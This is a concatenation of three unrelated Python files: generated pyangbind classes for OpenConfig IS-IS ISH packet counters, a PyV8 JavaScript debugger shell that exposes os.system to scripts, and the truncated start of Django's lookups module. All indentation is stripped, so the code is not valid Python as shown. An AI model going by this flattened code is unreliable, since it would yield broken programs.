Setter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_received is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_received() directly.
YANG Description: The number of the specified type of PDU received on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """received must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="received", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__received = t
if hasattr(self, "_set"):
self._set()
def _unset_received(self):
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_processed(self):
"""
Getter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
return self.__processed
def _set_processed(self, v, load=False):
"""
Setter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_processed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_processed() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """processed must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="processed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__processed = t
if hasattr(self, "_set"):
self._set()
def _unset_processed(self):
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_dropped(self):
"""
Getter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
return self.__dropped
def _set_dropped(self, v, load=False):
"""
Setter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_dropped is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dropped() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """dropped must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__dropped = t
if hasattr(self, "_set"):
self._set()
def _unset_dropped(self):
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_sent(self):
"""
Getter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
return self.__sent
def _set_sent(self, v, load=False):
"""
Setter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent() directly.
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """sent must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="sent", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__sent = t
if hasattr(self, "_set"):
self._set()
def _unset_sent(self):
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_retransmit(self):
"""
Getter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
YANG Description: The number of the specified type of PDU that that have been
retransmitted by the local system on the interface.
"""
return self.__retransmit
def _set_retransmit(self, v, load=False):
"""
Setter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit() directly.
YANG Description: The number of the specified type of PDU that that have been
retransmitted by the local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """retransmit must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="retransmit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__retransmit = t
if hasattr(self, "_set"):
self._set()
def _unset_retransmit(self):
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
received = __builtin__.property(_get_received)
processed = __builtin__.property(_get_processed)
dropped = __builtin__.property(_get_dropped)
sent = __builtin__.property(_get_sent)
retransmit = __builtin__.property(_get_retransmit)
_pyangbind_elements = OrderedDict(
[
("received", received),
("processed", processed),
("dropped", dropped),
("sent", sent),
("retransmit", retransmit),
]
)
class state(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module openconfig-network-instance-l2 - based on the path /network-instances/network-instance/protocols/protocol/isis/interfaces/interface/levels/level/packet-counters/ish/state. Each member element of
the container is represented as a class variable - with a specific
YANG type.
YANG Description: Operational state relating to ISH PDUs.
"""
__slots__ = (
"_path_helper",
"_extmethods",
"__received",
"__processed",
"__dropped",
"__sent",
"__retransmit",
)
_yang_name = "state"
_pybind_generated_by = "container"
def __init__(self, *args, **kwargs):
self._path_helper = False
self._extmethods = False
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"isis",
"interfaces",
"interface",
"levels",
"level",
"packet-counters",
"ish",
"state",
]
def _get_received(self):
"""
Getter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface.
"""
return self.__received
def _set_received(self, v, load=False):
"""
Setter method for received, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/received (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_received is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_received() directly.
YANG Description: The number of the specified type of PDU received on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """received must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="received", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__received = t
if hasattr(self, "_set"):
self._set()
def _unset_received(self):
self.__received = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="received",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_processed(self):
"""
Getter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
return self.__processed
def _set_processed(self, v, load=False):
"""
Setter method for processed, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/processed (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_processed is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_processed() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been processed by the local system.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """processed must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="processed", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__processed = t
if hasattr(self, "_set"):
self._set()
def _unset_processed(self):
self.__processed = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="processed",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_dropped(self):
"""
Getter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
return self.__dropped
def _set_dropped(self, v, load=False):
"""
Setter method for dropped, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/dropped (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_dropped is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_dropped() directly.
YANG Description: The number of the specified type of PDU received on the interface
that have been dropped.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """dropped must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="dropped", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__dropped = t
if hasattr(self, "_set"):
self._set()
def _unset_dropped(self):
self.__dropped = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="dropped",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_sent(self):
"""
Getter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
return self.__sent
def _set_sent(self, v, load=False):
"""
Setter method for sent, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/sent (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_sent is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_sent() directly.
YANG Description: The number of the specified type of PDU that have been sent by the
local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """sent must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="sent", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__sent = t
if hasattr(self, "_set"):
self._set()
def _unset_sent(self):
self.__sent = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="sent",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
def _get_retransmit(self):
"""
Getter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
YANG Description: The number of the specified type of PDU that that have been
retransmitted by the local system on the interface.
"""
return self.__retransmit
def _set_retransmit(self, v, load=False):
"""
Setter method for retransmit, mapped from YANG variable /network_instances/network_instance/protocols/protocol/isis/interfaces/interface/levels/level/packet_counters/ish/state/retransmit (yang:counter32)
If this variable is read-only (config: false) in the
source YANG file, then _set_retransmit is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_retransmit() directly.
YANG Description: The number of the specified type of PDU that that have been
retransmitted by the local system on the interface.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """retransmit must be of a type compatible with yang:counter32""",
"defined-type": "yang:counter32",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=long, restriction_dict={'range': ['0..4294967295']}, int_size=32), is_leaf=True, yang_name="retransmit", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='yang:counter32', is_config=False)""",
}
)
self.__retransmit = t
if hasattr(self, "_set"):
self._set()
def _unset_retransmit(self):
self.__retransmit = YANGDynClass(
base=RestrictedClassType(
base_type=long,
restriction_dict={"range": ["0..4294967295"]},
int_size=32,
),
is_leaf=True,
yang_name="retransmit",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="yang:counter32",
is_config=False,
)
received = __builtin__.property(_get_received)
processed = __builtin__.property(_get_processed)
dropped = __builtin__.property(_get_dropped)
sent = __builtin__.property(_get_sent)
retransmit = __builtin__.property(_get_retransmit)
_pyangbind_elements = OrderedDict(
[
("received", received),
("processed", processed),
("dropped", dropped),
("sent", sent),
("retransmit", retransmit),
]
)
|
|
#!/usr/bin/env python
import sys
import os
import os.path
import logging
import threading
import PyV8
class cmd(object):
def __init__(self, *alias):
self.alias = alias
def __call__(self, func):
def wrapped(*args, **kwds):
return func(*args, **kwds)
wrapped.alias = list(self.alias)
wrapped.alias.append(func.__name__)
wrapped.__name__ = func.__name__
wrapped.__doc__ = func.__doc__
return wrapped
class Debugger(PyV8.JSDebugger, threading.Thread):
log = logging.getLogger("dbg")
def __init__(self):
PyV8.JSDebugger.__init__(self)
threading.Thread.__init__(self, name='dbg')
self.terminated = False
self.exitcode = None
self.daemon = True
self.evalContext = PyV8.JSContext(Shell(self))
def __enter__(self):
script_filename = os.path.join(os.path.dirname(__file__), 'd8.js')
self.log.debug("loading d8.js from %s", script_filename)
with self.context as ctxt:
ctxt.eval(open(script_filename, 'r').read())
return PyV8.JSDebugger.__enter__(self)
def showCopyright(self):
print "jsdb with PyV8 v%s base on Google v8 engine v%s" % (PyV8.__version__, PyV8.JSEngine.version)
print "Apache License 2.0 <http://www.apache.org/licenses/LICENSE-2.0>"
def onMessage(self, msg):
self.log.info("Debug message: %s", msg)
return True
def onDebugEvent(self, type, state, evt):
json = evt.toJSONProtocol()
self.log.info("%s event: %s", type, json)
if type not in [PyV8.JSDebugger.Break, PyV8.JSDebugger.Exception, PyV8.JSDebugger.AfterCompile]:
return
with self.context as ctxt:
detail = ctxt.locals.DebugMessageDetails(json)
if len(detail.text) == 0:
return
print detail.text
cmd_processor = state.debugCommandProcessor()
running = False
while not running:
line = raw_input('> ' if running else 'dbg> ').strip()
if line == '': break
with self.context as ctxt:
request = ctxt.locals.DebugCommandToJSONRequest(line)
if not request: continue
response = cmd_processor.processDebugRequest(request)
detail = ctxt.locals.DebugMessageDetails(response)
if detail.text:
print detail.text
running = detail.running
def shell(self):
while not self.terminated:
line = raw_input('(jsdb) ').strip()
if line == '': continue
try:
with self.evalContext as ctxt:
result = ctxt.eval(line)
if result:
print result
except KeyboardInterrupt:
break
except Exception, e:
print e
return self.exitcode
def debug(self, line):
args = line.split(' ')
cmd = args[0]
args = args[1:]
func = self.alias.get(cmd)
if func is None:
print "Undefined command: '%s'. Try 'help'." % cmd
else:
try:
func(*args)
except Exception, e:
print e
@property
def cmds(self):
if not hasattr(self, '_cmds'):
self.buildCmds()
return self._cmds
@property
def alias(self):
if not hasattr(self, "_alias"):
self.buildCmds()
return self._alias
def buildCmds(self):
self._cmds = []
self._alias = {}
for name in dir(self):
attr = getattr(self, name)
if callable(attr) and hasattr(attr, 'alias'):
self._cmds.append(attr)
for name in attr.alias:
self._alias[name] = attr
self.log.info("found %d commands with %d alias", len(self._cmds), len(self._alias))
@cmd('h', '?')
def help(self, cmd=None, *args):
"""Print list of commands."""
if cmd:
func = self.alias.get(cmd)
if func is None:
print "Undefined command: '%s'. Try 'help'." % cmd
else:
print func.__doc__
else:
print "List of commands:"
print
for func in self.cmds:
print "%s -- %s" % (func.__name__, func.__doc__)
@cmd('q')
def quit(self):
"""Exit jsdb."""
self.terminated = True
class OS(PyV8.JSClass):
def system(self, *args):
return os.system(' '.join(args))
def chdir(self, path):
os.chdir(path)
def mkdirp(self, path):
os.makedirs(path)
def rmdir(self, path):
os.rmdir(path)
def getenv(self, name):
return os.getenv(name)
def setenv(self, name, value):
os.putenv(name, value)
def unsetenv(self, name):
os.unsetenv(name)
def umask(self, mask):
return os.umask(mask)
class Shell(PyV8.JSClass):
os = OS()
def __init__(self, debugger):
self.debugger = debugger
def debugBreak(self):
self.debugger.debugBreak()
self.debugger.processDebugMessages()
def quit(self, code=0):
self.debugger.terminated = True
self.debugger.exitcode = code
def writeln(self, *args):
self.write(*args)
print
def write(self, *args):
print ' '.join(args),
def read(self, filename):
return open(filename, 'r').read()
def readline(self):
return raw_input()
def load(self, *filenames):
for filename in filenames:
PyV8.JSContext.current.eval(open(filename).read())
def version(self):
print "PyV8 v%s with Google V8 v%s" % (PyV8.__version__, PyV8.JSEngine.version)
def parse_cmdline():
from optparse import OptionParser
parser = OptionParser(usage="Usage: %prog [options] <script file>")
parser.add_option("-q", "--quiet", action="store_const",
const=logging.FATAL, dest="logLevel", default=logging.WARN)
parser.add_option("-v", "--verbose", action="store_const",
const=logging.INFO, dest="logLevel")
parser.add_option("-d", "--debug", action="store_const",
const=logging.DEBUG, dest="logLevel")
parser.add_option("--log-format", dest="logFormat",
default="%(asctime)s %(levelname)s %(name)s %(message)s")
parser.add_option("--log-file", dest="logFile")
opts, args = parser.parse_args()
logging.basicConfig(level=opts.logLevel,
format=opts.logFormat,
filename=opts.logFile)
return opts, args
if __name__=='__main__':
opts, args = parse_cmdline()
with Debugger() as dbg:
dbg.showCopyright()
#dbg.start()
try:
exitcode = dbg.shell()
except KeyboardInterrupt:
exitcode = 0
sys.exit(exitcode)
|
|
import itertools
import math
from copy import copy
from decimal import Decimal
from django.core.exceptions import EmptyResultSet
from django.db.models.expressions import Func, Value
from django.db.models.fields import (
DateTimeField, DecimalField, Field, IntegerField,
)
from django.db.models.query_utils import RegisterLookupMixin
from django.utils.functional import cached_property
class Lookup:
lookup_name = None
prepare_rhs = True
def __init__(self, lhs, rhs):
self.lhs, self.rhs = lhs, rhs
self.rhs = self.get_prep_lookup()
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if bilateral_transforms:
# Warn the user as soon as possible if they are trying to apply
# a bilateral transformation on a nested QuerySet: that won't work.
from django.db.models.sql.query import Query # avoid circular import
if isinstance(rhs, Query):
raise NotImplementedError("Bilateral transformations on nested querysets are not supported.")
self.bilateral_transforms = bilateral_transforms
def apply_bilateral_transforms(self, value):
for transform in self.bilateral_transforms:
value = transform(value)
return value
def batch_process_rhs(self, compiler, connection, rhs=None):
if rhs is None:
rhs = self.rhs
if self.bilateral_transforms:
sqls, sqls_params = [], []
for p in rhs:
value = Value(p, output_field=self.lhs.output_field)
value = self.apply_bilateral_transforms(value)
value = value.resolve_expression(compiler.query)
sql, sql_params = compiler.compile(value)
sqls.append(sql)
sqls_params.extend(sql_params)
else:
_, params = self.get_db_prep_lookup(rhs, connection)
sqls, sqls_params = ['%s'] * len(params), params
return sqls, sqls_params
def get_source_expressions(self):
if self.rhs_is_direct_value():
return [self.lhs]
return [self.lhs, self.rhs]
def set_source_expressions(self, new_exprs):
if len(new_exprs) == 1:
self.lhs = new_exprs[0]
else:
self.lhs, self.rhs = new_exprs
def get_prep_lookup(self):
